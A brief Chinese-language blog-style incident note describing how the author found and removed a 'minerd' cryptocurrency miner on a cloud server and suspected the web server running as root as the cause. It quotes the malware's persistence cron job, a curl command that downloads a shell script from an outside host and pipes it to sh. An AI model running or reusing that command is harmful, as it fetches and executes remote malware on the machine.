服务器被攻击小计

今天看到阿里云的控制台 cpu始终使用率为100%,很明显不正常 top 查看进程 进程里面 minerd cpu使用率99% 应该是被别人挂马了 ls -l /proc/$PID/exe (ps -ef | grep minerd)

kill $PID; //结果过一会又出现了 再杀进程 然后chmod 000 /opt/minerd

这种木马肯定还有别的东西来保证他的运行,想到了定时任务 crontab -e 查看了一下 果然还是存在定时任务的 每五分钟执行一次 先把定时任务删除掉 /5 * /usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh 去这个地址下载shell 下面是内容

原因正在排查,很可能是因为web服务器为了省事用的root用户,现已全修改为www用户